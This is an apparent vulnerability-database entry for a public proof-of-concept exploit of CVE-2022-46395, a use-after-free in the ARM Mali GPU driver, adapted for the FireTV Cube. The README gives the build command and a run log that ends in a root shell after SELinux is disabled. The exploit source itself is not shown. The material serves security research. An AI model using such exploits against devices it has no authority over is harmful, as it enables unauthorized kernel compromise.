
CVE-2022-46395 PoC — ARM Mali GPU Resource Management Error Vulnerability

Source
Associated Vulnerability
Title: ARM Mali GPU Resource Management Error Vulnerability (CVE-2022-46395)
Description: ARM Mali GPU is a series of mobile graphics chipsets (GPUs) from the British company ARM. Like other 3D graphics chips built on embedded IP-core technology, the Mali chipset does not provide a dedicated display controller to drive an LCD panel (as a graphics card would); instead, it is a pure 3D rendering engine that renders images into a buffer, which a built-in display core dedicated to display processing then outputs. ARM Mali GPU contains a security vulnerability: an unprivileged user can perform improper GPU processing operations to access memory that has already been freed.
Description
CVE-2022-46395 POC for FireTV 2nd gen Cube (raven) 
Readme
## Exploit for CVE-2022-46395 to run on FireTV 2nd gen Cube

This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_46395) for CVE-2022-46395. Read his detailed write-up of the vulnerability [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug/). Changes have been made to account for FireOS's 32-bit user space. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.

The exploit was patched in PS7652/3564 (late August 2023). For reference, the following command was used to compile with clang in ndk-21:
```
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf
```
For fastest results, run it immediately after a fresh reboot. On average the POC takes 2-5 min to gain root.
```
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #
```
File Snapshot

```
[4.0K] /data/pocs/d711b8b29381c95a31287c9ec4e2265d2acf3253
├── [ 241] log_utils.h
├── [ 50K] mali_base_jm_kernel.h
├── [ 32K] mali.h
├── [ 24K] mali_user_buf.c
├── [2.1K] mempool_utils.c
├── [ 522] mempool_utils.h
├── [6.7K] mem_write.c
├── [1.3K] mem_write.h
├── [ 11K] midgard.h
└── [1.8K] README.md

0 directories, 10 files
```